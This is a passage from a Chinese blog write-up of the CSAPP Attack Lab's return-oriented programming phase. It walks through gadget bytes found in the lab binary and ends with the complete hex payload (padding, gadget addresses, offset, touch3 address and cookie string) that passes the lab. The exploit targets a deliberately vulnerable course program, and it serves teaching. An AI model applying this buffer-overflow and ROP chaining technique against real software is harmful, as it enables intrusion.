<p>但是由于不可以直接寻址，所以字符串不可以存在一个固定的位置，只能通过栈顶+偏移量的方式寻址，同时需要找到一个movq 寄存器,%rdi的语句。</p>
<p>1.找到转移到%rdi的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3</span><br></pre></td></tr></table></figure>

<p>movq %rax,%rdi的指令字节为：48 89 c7，所以这一条gadget的起始地址:0x4019a2</p>
<p>2.找到转移到%rax的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>d6 &lt;add_xy&gt;:</span><br><span class="line">  <span class="number">4019</span>d6: <span class="number">48</span> <span class="number">8</span>d <span class="number">04</span> <span class="number">37</span>           <span class="built_in">lea</span>    (%rdi,%rsi,<span class="number">1</span>),%rax</span><br><span class="line">  <span class="number">4019</span>da: c3                    retq </span><br></pre></td></tr></table></figure>

<p>可以将%rdi+%rsi的地址转移到%rax，所以后面要对%rdi和%rsi进行操作，起始地址0x4019d6</p>
<p>3.找到对%rsi操作的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>a11 &lt;addval_436&gt;:</span><br><span class="line">  <span class="number">401</span>a11: <span class="number">8</span>d <span class="number">87</span> <span class="number">89</span> ce <span class="number">90</span> <span class="number">90</span>     lea    <span class="number">-0x6f6f3177</span>(%rdi),%eax</span><br><span class="line">  <span class="number">401</span>a17: c3                    retq </span><br></pre></td></tr></table></figure>

<p>89 ce表示movl %ecx,%esi，起始地址0x401a13</p>
<p>4.顺着上一步，找到对%ecx操作的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>a6e &lt;setval_167&gt;:</span><br><span class="line">  <span class="number">401</span>a6e: c7 <span class="number">07</span> <span class="number">89</span> d1 <span class="number">91</span> c3     movl   $<span class="number">0xc391d189</span>,(%rdi)</span><br><span class="line">  <span class="number">401</span>a74: c3  </span><br></pre></td></tr></table></figure>

<p>89 d1表示movl %edx,%ecx，起始地址0x401a70</p>
<p>5.更进一步要找到将值转换到%edx中的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>db &lt;getval_481&gt;:</span><br><span class="line">  <span class="number">4019</span>db: b8 <span class="number">5</span>c <span class="number">89</span> c2 <span class="number">90</span>        mov    $<span class="number">0x90c2895c</span>,%eax</span><br><span class="line">  <span class="number">4019e0</span>: c3    </span><br></pre></td></tr></table></figure>

<p>89 c2表示movl %eax,%edx，起始地址0x4019dd</p>
<p>6.找到对%eax赋值的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>ca &lt;getval_280&gt;:</span><br><span class="line">  <span class="number">4019</span>ca: b8 <span class="number">29</span> <span class="number">58</span> <span class="number">90</span> c3        mov    $<span class="number">0xc3905829</span>,%eax</span><br><span class="line">  <span class="number">4019</span>cf: c3   </span><br></pre></td></tr></table></figure>

<p>popq %rax语句为58，起始地址0x4019cc，这一步可以将此时%rsp指向的值pop进%rax中，所以可以在此时%rsp指向处放置字符串的十六进制序列所在地址的相对偏移量，具体这个偏移量为多少，还需要继续探究。</p>
<p>另外，取值完这一条指令后%rsp+&#x3D;8，指向下一条，所以偏移量放置的位置应该是语句6之后，语句5之前。</p>
<p>因为在2中需要找到的目标式子为%rdi+%rsi，3-6说明可以将偏移量pop进%rax，然后一步步转移到%rsi中，那么剩下目标为将栈起始地址存入%rdi中。</p>
<p>7.找到对%rdi操作的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3</span><br></pre></td></tr></table></figure>

<p>代码48 89 c7表示movq %rax,%rdi，起始地址%0x4019a2，所以更进一步需要将起始地址先放入%rdi中。</p>
<p>8.找到读%rax操作的语句</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>a03 &lt;addval_190&gt;:</span><br><span class="line">  <span class="number">401</span>a03: <span class="number">8</span>d <span class="number">87</span> <span class="number">41</span> <span class="number">48</span> <span class="number">89</span> e0     lea    <span class="number">-0x1f76b7bf</span>(%rdi),%eax</span><br><span class="line">  <span class="number">401</span>a09: c3  </span><br></pre></td></tr></table></figure>

<p>代码48 89 e0表示movq %rsp,%rdi，起始地址0x401a06，将寄存器目前栈顶存入%rax，因此可以完成目的。</p>
<p>因此仍然利用数组溢出进行语句填充，先用40个00填充getbuf，然后按照8-7-6-偏移量-5-4-3-2-1-touch3-字符串的顺序填充，如下图所示。</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/20.jpg"></p>
<p>由于要执行movq %rsp,%rax语句的时候%rsp实际指向的movq %rax,%rdi这一条语句，所以存入的是原返回地址（图示）的+0x8的位置。字符串转化的序列存在touch3之后，所以可以看到存入的地址+9条语句空间&#x3D;字符串起始地址，所以popq语句之后的偏移量应该存72，即0x48。字符串根据同代码注入攻击中的35 39 62 39 39 37 66 61 00。</p>
<p>因此答案如下：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//填充40字节</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">06</span> <span class="number">1</span>a <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//8</span></span><br><span class="line">a2 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//7</span></span><br><span class="line">cc <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//6</span></span><br><span class="line"><span class="number">48</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//偏移量</span></span><br><span class="line">dd <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//5</span></span><br><span class="line"><span class="number">70</span> <span class="number">1</span>a <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//4</span></span><br><span class="line"><span class="number">13</span> <span class="number">1</span>a <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//3</span></span><br><span class="line">d6 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//2</span></span><br><span class="line">a2 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//1</span></span><br><span class="line">fa <span class="number">18</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">//touch3</span></span><br><span class="line"><span class="number">35</span> <span class="number">39</span> <span class="number">62</span> <span class="number">39</span> <span class="number">39</span> <span class="number">37</span> <span class="number">66</span> <span class="number">61</span> <span class="number">00</span> <span class="comment">//字符串</span></span><br></pre></td></tr></table></figure>

<p>成功通过：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/21.jpg"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CSAPP/" rel="tag"># CSAPP</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/11/CSAPP-Lab2-Bomb-Lab/" rel="prev" title="CSAPP Lab2(Bomb Lab)">
                  <i class="fa fa-chevron-left"></i> CSAPP Lab2(Bomb Lab)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/07/12/%E9%95%BF%E5%AE%89%E7%9A%84%E8%8D%94%E6%9E%9D/" rel="next" title="《长安的荔枝》| 小人物的挣扎">
                  《长安的荔枝》| 小人物的挣扎 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xinyi</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
